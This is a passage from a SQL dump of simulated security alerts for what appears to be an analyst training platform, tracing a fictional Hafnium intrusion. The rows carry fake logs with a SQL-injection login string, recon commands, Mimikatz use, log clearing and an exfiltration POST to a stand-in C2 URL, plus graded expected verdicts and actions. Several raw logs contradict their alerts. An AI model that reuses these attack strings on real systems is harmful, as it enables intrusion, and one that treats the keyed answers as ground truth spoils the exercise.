attackers\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"webadmin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Username for web server administration\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.935Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T13:45:23Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"http_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/uploads/chopper.jsp\\\",\\\"response_code\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\\\",\\\"filename\\\":\\\"chopper.jsp\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"webadmin\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.935Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T13:45:23Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"http_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/uploads/chopper.jsp\\\",\\\"response_code\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\\\",\\\"filename\\\":\\\"chopper.jsp\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"webadmin\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.935Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T13:45:23Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"http_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/uploads/chopper.jsp\\\",\\\"response_code\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\\\",\\\"filename\\\":\\\"chopper.jsp\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"webadmin\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.935Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T13:45:23Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"http_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/uploads/chopper.jsp\\\",\\\"response_code\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\\\",\\\"filename\\\":\\\"chopper.jsp\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"webadmin\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.935Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T13:45:23Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"http_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/uploads/chopper.jsp\\\",\\\"response_code\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\\\",\\\"filename\\\":\\\"chopper.jsp\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"webadmin\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(341, 'Credential Harvesting via Mimikatz', 'critical', 'Endpoint detection logs', 'With web shell access established, Hafnium utilizes Mimikatz to extract credentials, enabling further infiltration within the network. Endpoint detection identified the execution of the Mimikatz tool to dump credentials from LSASS.', 'Credential Access', 'T1003: Credential Dumping', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-11T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"process_name\":\"mimikatz.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"detection_method\":\"behavioral\",\"alert_trigger\":\"Unauthorized credential dump detected\",\"host_ip\":\"192.168.1.25\",\"host_name\":\"workstation-01\"}', '2026-01-03 00:04:00', '2026-02-18 12:29:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Corporate workstation\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Credential dumping tool\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Match with known Mimikatz hash\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(342, 'Lateral Movement Through SMB', 'high', 'Network traffic analysis', 'Using harvested credentials, Hafnium moves laterally across the network by exploiting SMB protocol vulnerabilities, targeting additional critical systems.', 'Network Propagation', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.15.23\",\"protocol\":\"SMB\",\"action\":\"Access Granted\",\"username\":\"j.doe\",\"file_accessed\":\"\\\\\\\\192.168.15.23\\\\C$\\\\Windows\\\\system32\\\\cmd.exe\",\"hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"event_id\":4624,\"message\":\"An account was successfully logged on\",\"logon_type\":3}', '2026-01-03 00:04:00', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known Hafnium APT IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Inventory\",\"verdict\":\"internal\",\"details\":\"Corporate workstation\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with Hafnium\'s lateral movement tools\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Valid corporate user\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(343, 'Execution of Reconnaissance Commands', 'high', 'Command-line audit logs', 'Hafnium executed a series of reconnaissance commands to map the network and locate key data repositories. This activity is indicative of an advanced attack with the objective of identifying sensitive data and valuable assets within the target organization.', 'Reconnaissance', 'T1016 - System Network Configuration Discovery', 1, 'new', NULL, '{\"timestamp\":\"2023-10-18T14:23:56Z\",\"event_id\":4624,\"command\":\"netstat -an; ipconfig /all; systeminfo\",\"user\":\"compromised_user\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"filename\":\"network_recon_tool.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-03 00:04:00', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Hafnium APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"network_recon_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"suspicious\",\"details\":\"Unusual tool executed on the endpoint by a compromised user.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious software used by Hafnium.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.938Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:23:56Z\\\",\\\"event_id\\\":4624,\\\"command\\\":\\\"netstat -an; ipconfig /all; systeminfo\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"filename\\\":\\\"network_recon_tool.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.938Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:23:56Z\\\",\\\"event_id\\\":4624,\\\"command\\\":\\\"netstat -an; ipconfig /all; systeminfo\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"filename\\\":\\\"network_recon_tool.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.938Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:23:56Z\\\",\\\"event_id\\\":4624,\\\"command\\\":\\\"netstat -an; ipconfig /all; systeminfo\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"filename\\\":\\\"network_recon_tool.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.938Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:23:56Z\\\",\\\"event_id\\\":4624,\\\"command\\\":\\\"netstat -an; ipconfig /all; systeminfo\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"filename\\\":\\\"network_recon_tool.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.938Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:23:56Z\\\",\\\"event_id\\\":4624,\\\"command\\\":\\\"netstat -an; ipconfig /all; systeminfo\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"filename\\\":\\\"network_recon_tool.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(344, 'Data Collection for Exfiltration', 'high', 'File access logs', 'An advanced threat actor, identified as Hafnium, has aggregated sensitive information. The data is being prepared for exfiltration. This activity was detected through abnormal file access patterns linked to known malicious IP addresses.', 'Data Collection', 'T1005: Data from Local System', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T15:23:34Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"username\":\"j.doe\",\"file_accessed\":\"/financial_reports/2023/Q3_financials.xlsx\",\"hash\":\"a1b2c3d4e5f67890123456789abcdef0\",\"action\":\"read\",\"status\":\"success\"}', '2026-01-03 00:04:00', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known Hafnium IP associated with data exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Unusual file access patterns detected.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"/financial_reports/2023/Q3_financials.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Monitoring System\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file accessed during off-hours by suspicious IP.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f67890123456789abcdef0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used by Hafnium.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.939Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:23:34Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file_accessed\\\":\\\"/financial_reports/2023/Q3_financials.xlsx\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0\\\",\\\"action\\\":\\\"read\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.939Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:23:34Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file_accessed\\\":\\\"/financial_reports/2023/Q3_financials.xlsx\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0\\\",\\\"action\\\":\\\"read\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.939Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:23:34Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file_accessed\\\":\\\"/financial_reports/2023/Q3_financials.xlsx\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0\\\",\\\"action\\\":\\\"read\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.939Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:23:34Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file_accessed\\\":\\\"/financial_reports/2023/Q3_financials.xlsx\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0\\\",\\\"action\\\":\\\"read\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.939Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:23:34Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file_accessed\\\":\\\"/financial_reports/2023/Q3_financials.xlsx\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0\\\",\\\"action\\\":\\\"read\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(345, 'Data Exfiltration via HTTP POST', 'critical', 'Network traffic logs', 'Anomalous outbound traffic detected from an internal host to a known malicious IP, indicating possible data exfiltration via HTTP POST requests.', 'Data Exfiltration', 'T1041', 1, 'resolved', 34, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\",\"http_method\":\"POST\",\"url\":\"http://malicious-cc-server.com/upload\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\",\"filename\":\"exfiltrated_data.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"john_doe\",\"response_code\":200}', '2026-01-03 00:04:00', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of possibly compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known command and control servers.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-cc-server.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"URL linked to data exfiltration activities.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"clean\",\"details\":\"File hash not previously associated with known malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User account potentially used during exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(346, 'Cleanup and Removal of Indicators', 'high', 'System event logs', 'In an advanced attempt to evade detection, the threat actor Hafnium executed commands to remove event logs and other indicators of compromise from the system. This action is aimed at erasing traces of their presence and prolonging unauthorized access.', 'Defense Evasion', 'T1070.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_id\":1102,\"log_name\":\"Security\",\"source\":\"Microsoft-Windows-Eventlog\",\"task_category\":\"Log Clear\",\"level\":\"Information\",\"user\":{\"id\":\"S-1-5-21-3623811015-3361044348-30300820-1013\",\"name\":\"hacker_user\"},\"computer\":\"compromised-host.local\",\"description\":\"The audit log was cleared.\",\"ip_address\":\"192.168.1.45\",\"malicious_ip\":\"203.0.113.5\",\"deleted_files\":[\"C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx\",\"C:\\\\Temp\\\\malware.exe\"],\"hash\":\"59a5d6a3b1c7f5e4a5b1c6a7f5e4d3c2\"}', '2026-01-03 00:04:00', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known Hafnium infrastructure.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"59a5d6a3b1c7f5e4a5b1c6a7f5e4d3c2\",\"is_critical\":true,\"osint_result\":{\"source\":\"virustotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known Hafnium malware sample.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.940Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":1102,\\\"log_name\\\":\\\"Security\\\",\\\"source\\\":\\\"Microsoft-Windows-Eventlog\\\",\\\"task_category\\\":\\\"Log Clear\\\",\\\"level\\\":\\\"Information\\\",\\\"user\\\":{\\\"id\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"name\\\":\\\"hacker_user\\\"},\\\"computer\\\":\\\"compromised-host.local\\\",\\\"description\\\":\\\"The audit log was cleared.\\\",\\\"ip_address\\\":\\\"192.168.1.45\\\",\\\"malicious_ip\\\":\\\"203.0.113.5\\\",\\\"deleted_files\\\":[\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"C:\\\\\\\\Temp\\\\\\\\malware.exe\\\"],\\\"hash\\\":\\\"59a5d6a3b1c7f5e4a5b1c6a7f5e4d3c2\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.940Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 